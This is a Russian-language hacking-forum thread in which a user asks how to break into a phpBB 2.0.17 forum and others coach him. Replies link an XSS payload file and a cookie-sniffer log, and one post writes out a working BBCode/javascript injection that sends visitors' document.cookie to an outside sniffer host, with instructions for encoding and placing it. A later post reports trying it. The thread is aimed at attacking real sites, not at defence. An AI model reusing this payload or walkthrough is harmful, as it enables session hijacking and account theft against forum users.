Взлом phpbb 2.0.17

Discussion in 'Песочница' started by -=SWAT=-, 28 Mar 2006.

  1. -=SWAT=-

    -=SWAT=- New Member

    Joined:
    16 Mar 2006
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    люди добрые кто может подробно описать как взломать форум phpbb версии 2.0.17 использую сплойт который есть на этом сайте для этого форума!

    очень интересно описание токо с чего начать что делать и чем закончить! просто как то не понятно какие программы использовать какие тонкости нужно знать и вообще как его кушать :))))
    в инете что то не могу найти подробного описания как и куда жать все как то облачно описывается к сожалению!

    или может кто может дать ссылку на подробное видео по взлому этой версии...

    буду очень признателен тем кому не лень описать как это делать...
     
  2. Noth!nG

    Noth!nG Elder - Старейшина

    Joined:
    8 Mar 2006
    Messages:
    31
    Likes Received:
    4
    Reputations:
    0
    Сверху жми video.antichat.ru, затем справа, там где написано "search" введи "phpbb".
     
  3. -=SWAT=-

    -=SWAT=- New Member

    Joined:
    16 Mar 2006
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    там я что то не вижу видео для взлома именно 17 версии :(
     
  4. Noth!nG

    Noth!nG Elder - Старейшина

    Joined:
    8 Mar 2006
    Messages:
    31
    Likes Received:
    4
    Reputations:
    0
    Тебе по-моему наведение нужно или сложно посмотреть на видео, найти нужный сплойт и сделать по аналогу? Я поражаюсь русскому народу. Мало того что всё на халяву тянут, так ещё разжуй им и в рот положи. Там столько видео по взлому ПХПББ, что совсем ничего не понять просто невозможно.
     
  5. -=SWAT=-

    -=SWAT=- New Member

    Joined:
    16 Mar 2006
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    да вот именно хотелось что бы разжевали :)

    посмотрел что то понял что то нет!!!!! все что пробовал по подобию делать не получается :(
     
  6. podkashey

    podkashey С крышкой по жизни!

    Joined:
    18 Jun 2005
    Messages:
    756
    Likes Received:
    351
    Reputations:
    353
    17 это число меньше либо равное 18, 19, 20 и тд..
    Если написано сплойт <=2.0.19, то в данном случае <= означает, дословно "версии до 2.0.19 включительно". Если написано < 2.0.19, то это уже не включительно. По скольку версии программ являются дискретными величинами, то, например, ближайшая версия меньшая версии x.y.z будет версия x.y.(z-1).
    Исключение составляют версии где z=0 или разработчики выпустили после x.y.z сразу x.y.(z+2) или даже x.(y+1).m. С каждым конкретным случаем надо разбираться отдельно, поэтому не стесняйся - спрашивай - здесь тебе с радостью помогут.
    Наверное все таки сложно написал, если что не понял, сообщи - дам ссылки на хорошие книги итд.
     
  7. vorishka

    vorishka Elder - Старейшина

    Joined:
    3 Mar 2005
    Messages:
    309
    Likes Received:
    43
    Reputations:
    22
    1. Юзай поиск :)
    2. XSS (настроен на античатовский сниффер):
    mudaak.narod.ru/phpBB2.0.18.txt
    З.Ы. Просто не знал как его сюда вставить. Пришлось залить в *.txt
    Кстати работает до версии 2.0.18. Удачи!
     
  8. -=SWAT=-

    -=SWAT=- New Member

    Joined:
    16 Mar 2006
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    podkashey и vorishka спасибки огромные!

    podkashey кинь ссылки почетаемсс мож что нового для себя найду!!!


    vorishka как я понимаю его просто нуна вставить в сообщение этот код который ты в ТХТ выложил? да и результат буит увиден в этом же посте или нуна буит где то еще смотреть?
     
  9. ProblemaT

    ProblemaT New Member

    Joined:
    16 Dec 2005
    Messages:
    42
    Likes Received:
    1
    Reputations:
    0
    Результат будешь смотреть в логах по адресу http://antichat.ru/sniff/log.php

    Но для удобства лучше свой снифер сделать...
     
  10. geforse

    geforse Elder - Старейшина

    Joined:
    2 Mar 2008
    Messages:
    617
    Likes Received:
    290
    Reputations:
    1
    Как в этот код засунуть свой снифер ???
     
  11. Jer1cho

    Jer1cho Member

    Joined:
    6 Jun 2008
    Messages:
    212
    Likes Received:
    65
    Reputations:
    10
    Регистрируй сниффер на http://s.netsec.ru
    Затем
    подставляй свой логин:
    Code:
    [B]:url(javascript:document.images[1].src="http://s.netsec.ru/ТУТ ТВОЙ ЛОГИН.gif?"[/B]
    После идешь на http://quest.antichat.net/code.php, выбираешь HTML Entities Encode, вставляешь
    Code:
    [B]:url(javascript:document.images[1].src="http://s.netsec.ru/ТУТ ТВОЙ ЛОГИН.gif?"[/B]
    То что получилось подставляй так:

    Code:
    [B][UR*L]http://www.[U*RL=http://google.com/style=display:none;background[SIZE=4][COLOR=Red]СЮДА[/COLOR][/SIZE]+document.cookie;&*#41;&*#32;]Link[/*URL][/*URL][/B]
    Звездочки, естественно уберешь....
     
    1 person likes this.
  12. perets

    perets Banned

    Joined:
    5 Jun 2008
    Messages:
    11
    Likes Received:
    1
    Reputations:
    0
  13. geforse

    geforse Elder - Старейшина

    Joined:
    2 Mar 2008
    Messages:
    617
    Likes Received:
    290
    Reputations:
    1
    Всё сделал по пунктам, получилось так:

    Ввожу получившийся код в сообщение вот что появляется:

    [​IMG]

    Нажимаю на Link

    Вылезает вот это:

    [​IMG]


    Снифер пустой....
     
Loading...